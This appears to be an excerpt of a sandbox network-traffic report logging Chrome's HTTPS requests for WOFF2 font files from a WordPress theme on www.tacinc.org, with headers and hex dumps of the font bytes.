                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: c5 fc 3d 3f fb 43 de f1 b0 bb 13 c7 2c 5c 02 31 c5 42 1a 1b a3 20 c3 28 3d f7 ed 08 fd 75 1f 6d 31 64 2d a8 ef c2 1a 2f 0e 0f f3 5b 51 37 46 78 2d 31 bc ad a5 ba 0e 4b 40 56 78 a6 ac db 2a 06 52 59 45 c1 57 09 3b 4f ae f2 75 0b f9 52 0a 3f 73 09 9c 10 ab 29 15 3a 3f 82 46 ed b3 34 58 9a c2 94 d5 b4 f7 88 82 9a dd ad 1d 25 0d 85 53 7e 97 e9 19 97 4a 42 9e 7a 7f ab 1c e5 ea 9b 16 6a 69 7e f7 f3 de 8a 3d 28 7e eb 66 c8 43 3a 7a 12 f2 df 79 43 f8 83 35 b1 5d 6c 0b 92 49 f9 9f a2 a7 e1 03 a3 4d 3e c6 6a cd ed 49 8e 71 76 bb df b7 43 d9 7c 65 da ba 61 4d 93 b8 cd 7b d6 22 ae 17 96 59 39 82 63 39 7f 5c 8f b1 49 37 dc e0 65 73 c2 64 ea 77 b5 13 a9 54 97 4a 73 0a a2 42 35 2b 9b ac 3c f3 58 79 9d 77 d3 5a 29 e7 8a 03 aa de 23 c6 ca d9 09 a4 38 3b 0d ad 4a 24 d6 87
                                                                                                                                                                                                                              Data Ascii: =?C,\1B (=um1d-/[Q7Fx-1K@Vx*RYEW;OuR?s):?F4X%S~JBzji~=(~fC:zyC5]lIM>jIqvC|eaM{"Y9c9\I7esdwTJsB5+<XywZ)#8;J$
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 34 8c 89 91 23 90 23 9e 41 0c eb 2b 1c 81 1a d1 c7 32 6c b3 16 05 a2 8c 18 bc 6a 5f f5 34 ad 1a 6d 81 db 92 4d c3 0e 0b d9 ab 9b 79 9a 57 e5 c4 f0 b0 e0 7d 7b 35 75 e8 9e 36 7c c7 48 a7 19 9a 63 31 8d 70 04 a4 c2 ed 50 20 71 05 dc 91 d9 dd a1 46 e2 bf 0b d5 e8 11 cb f9 31 ce ec 35 51 7f 74 b8 60 22 0d df a6 18 89 46 83 cd c3 8f 7d 0b f6 d8 a6 c5 62 01 21 8c 96 aa c6 e6 b6 13 f4 45 4a 04 33 cc 05 52 15 18 eb 13 a3 3c 1a 29 f6 3b 62 86 32 68 c3 25 a3 49 ab ae d8 f4 d2 46 5c e9 0e 70 02 8a ae 6c 84 b2 ba 36 6b e1 08 2e b8 93 1b 0b c8 24 b5 e9 45 69 38 46 1a 72 99 84 23 d2 46 2c 0f 46 cd 26 8f e2 0a 2a 7c ae 7e 7b 53 a5 cb 81 2e 27 3d 00 2d 00 f1 17 88 7a a0 dd 0e 00 9d 7f 01 50 ac 02 72 0c 30 fb 0f 20 01 90 90 10 91 77 8f 5a 64 32 c8 c1 08 87 0c 5a 87 80 04
                                                                                                                                                                                                                              Data Ascii: 4##A+2lj_4mMyW}{5u6|Hc1pP qF15Qt`"F}b!EJ3R<);b2h%IF\pl6k.$Ei8Fr#F,F&*|~{S.'=-zPr0 wZd2Z
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 6c 15 18 7c cc 7e 18 b2 b7 4f dd 25 79 d5 2b 7d a8 41 17 e0 fe b4 58 a2 9b fe cc 6e 5c c7 02 08 2c 27 2e 1b 75 52 9a 57 32 36 5b c6 70 d6 44 e2 3c 15 97 31 1d 0f 3f 91 6c c0 bc df 80 16 92 15 ea 39 42 6a 2d 9e 27 e1 5e a0 e1 1c b4 17 76 8f 1e 32 64 85 58 2e 23 64 c5 a2 6d 8d 8c 04 ae fa f7 6a 9c dc 1d bf ef 7d f2 0c 1c c0 64 55 80 d1 22 a9 2f e4 b9 cc 87 c1 4c c3 be 21 65 ec d3 64 e8 0a 72 51 17 30 3c 45 a4 53 cd ce 70 70 90 24 4b 19 a8 04 07 f0 4b 08 b9 d4 94 ea ef 28 8e 84 78 52 19 79 52 62 c7 7c b8 01 41 40 4d 1c 80 fb 94 07 2e 94 fb e4 96 1d 8b d0 44 88 f7 f2 fe cd 7f e4 ff e2 3f 29 e4 2d 8c 4c 4f ef d4 8c b2 eb 26 74 f3 ce f0 4d 29 97 b0 5e b4 a1 26 28 c8 7e 3b 81 96 56 9d 69 1c cf c8 b1 b6 b1 5f 92 2b ef a6 de 67 97 25 e5 67 db 8e 35 0d eb ae 1e ee
                                                                                                                                                                                                                              Data Ascii: l|~O%y+}AXn\,'.uRW26[pD<1?l9Bj-'^v2dX.#dmj}dU"/L!edrQ0<ESpp$KK(xRyRb|A@M.D?)-LO&tM)^&(~;Vi_+g%g5
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: de a0 37 ee 08 42 a2 fa b6 bc 9f a1 d2 25 92 40 72 df 17 be 25 65 a4 4c 8d a5 f0 0a ce 54 9a 45 ba 52 81 b9 05 58 45 88 a5 b5 c0 0d 15 e5 70 a3 90 7c 6d 14 72 3f ab d4 40 ad 51 b1 a7 12 68 b6 f6 e5 cc 12 9b 50 b3 62 49 bb ce f6 0e 2d d2 1e a5 a7 50 b0 66 47 60 a0 ef 62 c8 12 6a 53 aa f4 a5 1e 4b ef 96 5e 4b ef 25 5f 6f 8a da 37 c7 31 77 56 bb be 9c 77 a9 1a fb a6 b4 98 d0 0e bd 29 f5 2b 8b 49 7a 91 a5 50 a0 da 9b 46 3d 0b bb 2d 0d b4 73 54 03 4f c2 ac cf bf 70 c9 0b 5b 08 f8 cb 8c 9e 44 c4 e6 30 17 7d a1 3d f6 9b 84 2e 2e 77 18 ed dc 93 21 d9 b0 8c 0c 7d 28 77 a3 f7 12 f9 26 99 c6 57 db 52 e7 f4 95 af 9e 46 b8 a7 32 15 b6 f8 9a e7 cc 21 b6 e5 67 e6 b7 11 9b eb 53 3f d3 07 f9 5c 21 94 2f a4 54 e8 35 72 4b a8 f8 ff a8 0f 29 12 fa dc f7 26 e4 a9 da b8 2d 79
                                                                                                                                                                                                                              Data Ascii: 7B%@r%eLTERXEp|mr?@QhPbI-PfG`bjSK^K%_o71wVw)+IzPF=-sTOp[D0}=..w!}(w&WRF2!gS?\!/T5rK)&-y
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: e1 09 dc 05 6b 60 3d 8f 6e 56 61 cf 42 67 1c ab d6 14 0b 69 8e 37 aa 28 0a a1 79 8a 7f e5 ef 3f dc f8 b4 ea 5f d8 e1 34 54 a4 56 50 21 47 c0 7e 7e c6 4a bf 83 f1 d5 dc 6f 9a 2d cd f6 65 7b 88 3c 82 6e fd a9 57 3a 25 2d 65 d1 33 95 d0 49 99 4e f5 ca 64 45 a1 fb 11 9a 4a 60 98 52 d2 fe fb 0f 37 ae 16 7f 00 db ec 4e 73 ba d9 ee b4 49 1a aa 2c 69 84 f9 d3 93 02 ac 32 c2 d4 9a 8a 1a 2b 3c c2 15 b6 be aa c8 96 ae 99 55 6e 7d 48 98 f8 40 bf ca a3 d6 09 9d 94 2a aa b7 44 06 87 ee 87 69 72 9b d9 e5 b4 a6 5a 29 68 1e bd c7 dd c7 d3 fb 79 8b 9c 77 ef 3a d0 bd 7e 3e 56 1b a3 de a4 da f9 36 77 f0 93 d4 06 5d 48 eb 9b 5a d7 de 3e b5 ce a7 d5 85 1a 52 3f 71 07 6d 7c aa fd 66 8c 5a 66 b3 7b 75 5a 9c 96 82 f6 e6 34 b6 90 c1 a8 52 66 2b 29 68 68 5e de 07 f9 a3 80 3a 78 a4
                                                                                                                                                                                                                              Data Ascii: k`=nVaBgi7(y?_4TVP!G~~Jo-e{<nW:%-e3INdEJ`R7NsI,i2+<Un}H@*DirZ)hyw:~>V6w]HZ>R?qm|fZf{uZ4Rf+)hh^:x
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 7a 0d 8d 2f 99 1e aa 6d 6e fe bf bd fd 0f 8f e7 8f c8 f8 7f 3a f7 da 90 90 14 34 68 2c 3a 43 4f 79 50 73 f8 eb 9f 3f d1 df 5e 9d 91 58 db d7 9f 5c 13 cb 68 b7 b4 7e e1 d5 79 7f 26 5a ec e9 6b dc a9 0c cf 0b 81 70 e5 17 ad 47 ad a5 b2 00 6f 19 4f e6 d7 6c f4 63 97 6c 1e 3d 7e 7c f3 e8 92 e8 a0 0f b6 ea 8a cd 55 3a 9d 37 19 c7 ba 11 46 74 02 6d 44 64 b8 13 71 af 21 66 8e ea 78 3f 8d 1e 76 e2 b7 04 9a 36 52 5c bc 4c 02 b1 da 62 dd 3d c5 c0 13 51 dd 07 c3 54 a5 bb a5 0c f7 dd 8b 36 a1 4a ef b0 da d9 b9 ba 9d ef 58 6e 31 f2 d5 82 d8 eb e8 2e 67 3c d3 1f 70 42 6d 3a dd be bf 5d 52 36 a2 a5 a0 2e ea e1 3c 2c b7 12 4f 05 2a fc 46 74 83 ba e4 c1 22 b3 e0 f7 89 85 ad bb 1f 8a 37 d2 d3 56 9f 1a 98 9f 2f db 6f ce f9 fd 9c 49 27 1b 92 ed b9 fc 61 44 27 9b fc 42 6f d8
                                                                                                                                                                                                                              Data Ascii: z/mn:4h,:COyPs?^X\h~y&ZkpGoOlcl=~|U:7FtmDdq!fx?v6R\Lb=QT6JXn1.g<pBm:]R6.<,O*Ft"7V/oI'aD'Bo
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 4d 2f 78 89 94 e0 29 b0 23 71 a6 ea e1 eb e8 66 79 09 69 b6 ef 65 75 fd 12 f8 60 16 f0 e6 d6 64 fc 12 e2 2c 5c 06 6e 16 b1 9d b9 8b 89 1a a5 3f eb 3c 82 88 3d b5 a9 7b 35 22 ee f3 83 dd 93 17 e7 3f 7b 29 f5 48 0c 48 00 98 b2 03 30 63 4f 1a 00 c0 95 9d f2 5c e7 f3 d7 66 b5 4b cf d6 de b5 79 80 a3 73 02 c0 17 03 81 9c dc 25 98 b3 3b 44 62 23 9a 87 27 c4 e6 73 c2 0d fa 60 c8 a7 60 66 6c 6a 0e 24 b5 88 02 33 63 68 7b f1 07 47 4e 02 80 9e f5 38 e8 c8 7d ba b9 bf e4 bd ec 8b 99 b1 29 10 42 91 43 60 66 0c 85 5c e4 03 00 43 2d 5b 00 ec 6d ec 1c 9a 3e cf b6 0b 80 fe 66 21 ec 6d 70 b0 cb 6e 07 f6 36 b8 c1 e7 a9 00 41 59 25 b0 b7 b1 43 23 2d cb 02 f6 36 b8 a1 f4 ae ff bb 1e fe 00 b2 2d d3 bf dc 26 6c 96 4e be 9f df e2 71 d4 b7 8f 1e 57 7f a9 4c 5c 29 01 00 b3 8f 27
                                                                                                                                                                                                                              Data Ascii: M/x)#qfyieu`d,\n?<={5"?{)HH0cO\fKys%;Db#'s``flj$3ch{GN8})BC`f\C-[m>f!mpn6AY%C#-6-&lNqWL\)'


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              56192.168.2.649783141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC676OUTGET /wp-content/themes/tac-child/css/fonts/lora-v16-latin-600.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 18992
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:25 GMT
                                                                                                                                                                                                                              ETag: "66f56b8d-4a30"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c9bbd86c64-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 4a 30 00 10 00 00 00 00 9e 1c 00 00 49 ce 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 58 1b ff 4a 1c 83 10 06 60 3f 53 54 41 54 36 00 84 72 11 08 0a 81 9e 10 fc 51 0b 83 60 00 01 36 02 24 03 87 2c 04 20 05 85 08 07 20 0c 07 1b 67 8a 25 6c 9b 56 bc db 01 6a 34 bb 5e 71 64 20 d8 38 f0 30 0e ef 46 51 ba 49 df 94 fd ff 09 49 c7 18 c2 b4 4d 40 d3 ea 37 22 1a 91 86 09 30 62 98 b2 d2 d5 ac 49 5a c8 d6 7d 47 5a ee a3 70 34 f9 54 f3 43 48 c2 cd 9e 92 fc bb d1 f9 ca 2d af 86 05 19 40 35 20 4d ee 71 4a 38 ac 20 71 76 67 d3 80 d3 02 c4 65 a2 e5 97 0f d8 0d 05 3f 5e ee 74 10 5b 8f 97 ff fb b7 cf 19 e0 0e 2b 76 e5 a1 c7 8e f7 ef cc be 88 a8 64 94 64 25 97 aa 59 e5 a4 8a bf d0 09 da 1f 78 b7 f5 3e a0 a0 4c
                                                                                                                                                                                                                              Data Ascii: wOF2J0IXJ`?STAT6rQ`6$, g%lVj4^qd 80FQIIM@7"0bIZ}GZp4TCH-@5 MqJ8 qvge?^t[+vdd%Yx>L
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 8a 22 88 a3 6e 78 ea 70 10 52 c4 47 9a e6 03 82 14 fb c3 ed 41 be fe d7 80 24 c0 c5 e2 fb d0 ba 76 24 c1 ce e2 47 c2 82 61 fd c6 bb c2 26 c2 99 e1 d5 c4 d7 7a fa 81 31 67 9c 18 b1 2b 72 30 f2 26 99 47 76 92 57 43 f7 17 a9 9f d3 4f 31 9e 6f 25 6a 5d d4 b0 01 eb 62 d4 03 66 a2 b7 83 b9 61 0b b0 8e 68 5c 74 29 8b 21 5a 1a 88 1e 88 3e 76 8e 7e 2c 3a cc 62 b0 82 f4 bc 61 fe 17 d9 2c f6 74 f6 08 e7 0e 57 c4 f5 70 cf 70 ff de d6 c5 4b e0 bf 2f d4 88 64 37 5d a9 68 a9 e8 b0 e8 aa e8 5f 74 0a fa 06 7a 01 fd 53 6c 13 63 e2 a5 92 99 92 5d 52 90 32 a5 59 d2 95 d2 c3 31 7b 64 2c b9 40 d1 a5 ea 51 df 53 3f 45 4c db ef 59 e7 33 6c 37 c4 14 fd 0e df 45 03 c3 90 6b 98 69 d8 e3 3f ec ff d6 c8 33 a6 1b f3 8d 0d c6 2e e3 87 c1 c1 90 cc 54 67 ea 00 9c 68 88 22 60 be 59 44 cf
                                                                                                                                                                                                                              Data Ascii: "nxpRGA$v$Ga&z1g+r0&GvWCO1o%j]bfah\t)!Z>v~,:ba,tWppK/d7]h_tzSlc]R2Y1{d,@QS?ELY3l7Eki?3.Tgh"`YD
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 1a 09 2d 6a 63 f2 72 7f a1 c6 6c 87 49 18 c0 04 81 21 50 58 8e 7b 0f 09 a1 a8 72 4e 2c 13 92 25 5b 8e 5c 79 f2 15 28 8e d2 38 b6 f4 b6 36 55 9b a2 57 f2 94 93 37 95 bb 56 31 ae 64 ab e2 aa de 51 43 ad e5 ab 63 5c 5f 49 0d 0c 8d 68 3a 1c 12 18 0c 06 83 01 bb a0 85 20 88 b6 e1 e6 19 e5 b4 b4 26 26 26 0c 06 83 c1 60 18 32 2c 94 b8 34 d1 9e c2 d6 79 36 ac 6c 62 cb b6 9d f1 ae bd 3d 3b be a8 7e 5b 01 04 f3 10 cb 3e ec e0 f1 87 72 61 0b a7 03 c4 ae 99 9d 29 9d 53 2e bc 2a ea 6d 1f cd 7d 22 2e bf 7f b3 18 4d f4 8e 78 86 12 19 4b 96 55 aa d2 ae 8c 5d e3 a6 de 79 cb bd 37 7e a8 b8 c7 14 3d 95 e7 e9 1f d9 7e 12 7b 09 e9 55 f9 9b 95 77 cc bf a6 d2 69 3b 4e a2 05 5c 20 30 04 0a cb 71 1f 23 25 28 2a 5c e5 35 32 89 2c 64 cb 91 2b 4f be 02 c5 df aa 94 62 89 4a 48 21 b8
                                                                                                                                                                                                                              Data Ascii: -jcrlI!PX{rN,%[\y(86UW7V1dQCc\_Ih: &&&`2,4y6lb=;~[>ra)S.*m}".MxKU]y7~=~{Uwi;N\ 0q#%(*\52,d+ObJH!
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 73 5a b0 e0 32 e3 d1 e1 5d cf c1 d2 35 c9 de 82 86 99 de f9 56 22 2e 2e 92 50 ac 9f d8 08 d2 65 7a a0 3c c5 8f 5a a5 95 43 4c e3 cd c5 77 06 dc 76 2b 94 07 46 dd 89 45 af 96 97 23 c4 29 2e cb 90 ab 15 15 3f a2 ba 0b 7b 70 4b 95 d7 c1 41 7c 72 34 7d b5 1c 79 ae 1d 7f f6 00 f9 ec e1 f1 43 df b8 82 37 87 77 c5 d0 b7 f2 2e 41 60 08 14 06 5f d2 2f 7b 11 b6 0b 73 ec 24 42 f9 ad d2 05 2a 2a 97 55 d4 11 77 d6 09 89 71 0f 4b 77 4f 71 1f fb 65 49 82 03 41 60 08 14 06 cf 7f 1b da 37 34 31 a5 d4 ae 5c bb f1 f3 98 ea 44 25 4c 59 48 64 b1 ae bd 45 ad 0e 51 34 a8 59 f8 88 a7 ec 92 87 77 1d 21 bf de 20 95 de e9 61 b3 48 23 bb 2d ab 6d 15 0e 2b 64 53 74 14 57 da 98 7c 88 bd ec 78 4d ff 2e 60 d2 94 c8 25 4f 42 01 01 81 21 50 18 9c c0 c5 c3 5b 22 b3 c1 2d 63 5a d9 18 a9 4c
                                                                                                                                                                                                                              Data Ascii: sZ2]5V"..Pez<ZCLwv+FE#).?{pKA|r4}yC7w.A`_/{s$B**UwqKwOqeIA`741\D%LYHdEQ4Yw! aH#-m+dStW|xM.`%OB!P["-cZL
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: af 03 9b e9 82 74 1e a1 79 bc 74 a4 74 ec 40 52 23 da ce b8 85 19 8a bd 7f f0 c7 37 38 1a a5 7b bc be d5 cc 10 1e 0f 8c 3c 70 11 ee d3 36 ee 3d e1 df 93 10 6c d8 a8 36 76 94 3e 5f b2 2e ec 88 86 cb b8 53 dc 67 b0 f2 11 16 81 00 af ae 12 3f 24 7a 3f f9 5f ff 8d e7 5d e6 5f 6a 64 ce b7 15 f5 04 2a 47 df 94 47 a9 9f 45 d9 40 cb 05 27 1a f8 fd 50 5c 84 27 56 0b 66 65 ff 9d 75 9b 8a 24 be 05 26 08 0c 81 c2 16 d9 4a 73 1b be d6 a4 92 83 af c1 03 43 98 67 7d 71 54 4e 7c 68 78 f4 ec 07 ee 86 3b a2 75 73 5a 88 cc ac 47 f2 0b a4 7b 56 80 0f 51 7f 95 62 56 26 49 92 24 49 92 e4 5d ec 71 9f 5c 61 ae 1f f1 af 59 81 2e f7 bb 93 64 0f 04 81 21 50 d8 b7 c2 ab 8a ab 24 3e 78 ea 41 10 04 41 6e be 53 ef 47 d2 e6 a9 f0 46 29 fb fa 2e 04 02 81 40 3a d4 aa cb bb 53 d4 13 52 af
                                                                                                                                                                                                                              Data Ascii: tytt@R#78{<p6=l6v>_.Sg?$z?_]_jd*GGE@'P\'Vfeu$&JsCg}qTN|hx;usZG{VQbV&I$I]q\aY.d!P$>xAAnSGF).@:SR
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 52 d1 ca 54 20 ab 55 2b 5c a3 46 4a 4d 9a a8 b4 68 a1 d6 aa 53 84 5e d3 50 4d 37 9d c6 0c 33 e0 cc 34 53 34 27 97 10 09 45 94 bb ef 88 f4 ee 69 b6 f7 cc f1 be d9 f6 9b e3 a0 65 0e dd 95 3b ec 03 5a bc b5 18 1b 44 44 20 4e f8 1c 0d 71 e0 41 c4 ca 28 84 2b 21 c7 6a e0 69 e9 20 e0 41 60 c3 81 08 5d 5c 39 36 9c 9c 18 d9 0d c7 12 38 22 e1 89 7a b7 50 b8 22 24 ac 93 a8 aa bc 8e 53 7f 9a a1 21 44 8c 41 be 8e 6a 26 22 79 ab 15 43 93 a4 2e 22 af 93 ac d3 eb 49 0e 12 4c a2 61 12 0d 1f c1 56 14 02 f8 3e 82 82 03 a7 cd 41 b8 9f 9c 16 84 96 cb af 51 d0 b0 b0 71 08 b9 93 78 3f 31 54 0c 8c 62 99 58 d9 25 49 66 e2 45 af 80 5c 79 f2 ab bd 57 ae 52 4d 23 34 5e 6e d5 dd 9c 48 f7 02 bd 21 64 c0 08 a0 eb 6b 83 81 1a 34 18 f1 ac be bb e1 db 78 7e b1 9c 8f 79 57 17 fe 45 ad 3d
                                                                                                                                                                                                                              Data Ascii: RT U+\FJMhS^PM734S4'Eie;ZDD NqA(+!ji A`]\968"zP"$S!DAj&"yC."ILaV>AQqx?1TbX%IfE\yWRM#4^nH!dk4x~yWE=
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: c8 0f 28 b1 f9 aa 5b ca 48 91 53 7d 5a d9 7f 48 d7 11 00 17 08 54 bb 33 fe 03 50 2a 71 db 73 88 ec 2e 92 ef aa 48 d8 37 51 a1 25 b8 58 40 92 5b 55 2c e8 99 4a 63 22 e7 f7 79 37 24 aa 69 1d 6e 04 28 44 91 68 4e 66 79 b7 50 9f 14 64 c6 1e 94 fa fa e7 ce eb 2b 36 4e 2b bb 59 47 b0 f1 a6 c8 20 4a 81 c2 0c 5b 5a fb f2 04 14 19 a2 28 50 53 ce b1 c5 99 a7 10 fe 67 2f 2d b4 98 2d 53 8f d2 23 95 4a 76 3f dd 8b a5 ff ac 47 14 31 d3 23 70 49 11 16 61 87 17 6a 77 e6 ae 8e a5 52 46 9a c2 26 fb 02 9b 40 b7 a3 c3 14 2f 1c 53 98 cc 72 98 6f 0c 71 31 47 3d 31 dd a7 71 dc 7d ee 22 7a 45 e7 45 42 48 d7 2d 11 00 35 97 78 8a 78 50 a0 3e 71 91 7c af 71 94 4a 81 a4 3d 78 e5 64 1e 54 d9 57 36 c8 55 6d 81 e9 7a a8 bd 6c c7 31 be 48 fe 46 59 6f 47 2f 0c 15 eb d4 9c 0d 01 65 72 56
                                                                                                                                                                                                                              Data Ascii: ([HS}ZHT3P*qs.H7Q%X@[U,Jc"y7$in(DhNfyPd+6N+YG J[Z(PSg/--S#Jv?G1#pIajwRF&@/Sroq1G=1q}"zEEBH-5xxP>q|qJ=xdTW6Umzl1HFYoG/erV
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 50 47 ab c3 a5 80 c7 10 68 e3 b4 42 06 80 4a f7 13 6d 3c 44 d2 73 d3 f5 21 fd 28 26 b7 fa d9 9d 49 b7 27 4c 25 4d 7a 33 ac 35 50 e0 40 62 50 81 11 9c 48 c9 b1 9a aa 48 d9 78 aa 0f 94 b1 ef 38 c8 ea c2 0a e6 d6 bb 81 2e 23 f9 6b 6c 42 86 c0 4a 6a d1 cf 6d 1f fa 72 64 58 7c 2b 46 d8 a0 12 af ca 51 18 fb b2 f9 7e 3b e6 b9 29 62 00 09 95 78 ba 9a f8 80 20 18 31 36 bc aa 78 4c 66 4e 26 4a aa 04 d3 62 4c 97 9a 55 b2 b7 35 4f 30 ca c2 24 ab 94 c4 72 37 8c 94 b3 f3 63 f4 be 16 2a 51 11 4c 2b 36 f2 6b c4 90 e4 b0 28 e3 6a c5 8a da 9e 15 5a fe df 14 0c a6 60 28 c7 ce dc e6 e3 19 57 5e a5 20 98 a7 d3 cf 50 36 cf a5 e5 9c 73 03 14 43 f6 2f b4 5c 42 4d 95 a9 90 74 2a b4 35 2f f3 5e 1a 0b 67 c2 0a 68 d5 fe d2 75 0e 98 b8 c3 9e 62 a6 18 0b a6 a1 d1 4a 91 4e bc 0d 27 6d
                                                                                                                                                                                                                              Data Ascii: PGhBJm<Ds!(&I'L%Mz35P@bPHHx8.#klBJjmrdX|+FQ~;)bx 16xLfN&JbLU5O0$r7c*QL+6k(jZ`(W^ P6sC/\BMt*5/^ghubJN'm
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 60 ca ab 06 53 23 6a f0 52 3e 7c 38 cf 84 a5 2e 7c 81 b9 59 37 0a eb 71 29 6e a3 3b d9 b6 f9 39 1d af 08 c9 28 66 60 b7 f3 1e 12 dd b0 34 14 da 98 8e 27 72 ab 81 01 89 2f c7 04 43 ba 7e dc 6e 3d 07 e3 2c 5f be 1a 80 f2 d7 a8 1c ce 48 99 ba 3a 52 41 b5 ed 87 ed de 9b 76 c8 08 45 64 18 6f b4 5b 4f 34 33 93 24 46 7d 71 7b c3 b9 97 d0 a1 62 8e b4 e8 c5 94 c9 28 78 8e 6f 84 28 ff 28 ee 1b e2 e4 e9 16 40 03 b7 30 e6 b6 ed ed 60 35 d6 ff 0c 22 ef a7 50 cd f8 54 04 f0 b9 7f f3 a9 6a a5 69 76 ec ff 18 28 a5 d1 ba 7d 15 e2 07 88 73 b5 50 a8 84 4a 1e a0 18 94 e0 8a 69 1c 2d 29 b4 5c 91 a5 35 78 9e 02 1d a9 d8 c3 47 81 ea 2e 75 28 ec 83 bb 0d 10 3c 32 8b a3 fc 9b cb cb 3b 70 9b 5b c1 d2 ac c7 f4 b9 b9 f5 42 be ff 4a 26 bb 6e e1 4b 11 f1 a7 f2 64 71 10 f5 76 8a 3e 92
                                                                                                                                                                                                                              Data Ascii: `S#jR>|8.|Y7q)n;9(f`4'r/C~n=,_H:RAvEdo[O43$F}q{b(xo((@0`5"PTjiv(}sPJi-)\5xG.u(<2;p[BJ&nKdqv>
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 5f ed 29 cd 26 c6 f8 bd a9 3d ca 7c 00 2e 05 a8 42 fb bf 55 b9 17 4b 21 58 e0 33 7e fe cb 6c 21 73 84 a2 7e 3d 1f 7e bb a2 2f 3a f7 c5 9e 54 c7 0a 75 05 2c c2 f2 9b 95 0b 31 37 21 cd 79 4a 10 35 a7 54 97 f9 0e 89 3e fa fc 2d d3 be 73 cb e8 89 2b 88 97 2a 01 ea 2a 35 a1 50 12 95 7e 5e 38 a0 1f 9c 15 f3 b5 58 29 78 49 f2 40 20 05 63 68 95 0f ac c1 74 5e 42 9f 7d 0b e6 30 7b 7b ce d4 5d 9f 10 8c 2d 17 a1 a2 a1 b1 d1 08 27 af ac 2b 4b a2 70 59 8d 7b bf f1 0b 04 b7 f6 c9 bf 18 5e 0b a7 6f d5 e9 73 b3 74 96 38 cc ae 95 d5 f8 34 ca c9 01 95 c3 aa f1 c4 25 a7 96 75 c6 e5 e8 26 f1 9a 74 99 c8 9d a4 c8 c2 c6 62 9f 72 1b 4d ac 7e e2 93 77 9d ca d3 9d 93 79 e3 50 36 a6 2e 92 63 9a 2a 4e 52 92 fb 3e 24 df 4c 14 66 d5 0e a6 fd 2a 44 45 52 84 ea 8c b2 0f 9f ff 44 05 0f
                                                                                                                                                                                                                              Data Ascii: _)&=|.BUK!X3~l!s~=~/:Tu,17!yJ5T>-s+**5P~^8X)xI@ cht^B}0{{]-'+KpY{^ost84%u&tbrM~wyP6.c*NR>$Lf*DERD


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              57192.168.2.649781141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC687OUTGET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-italic.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
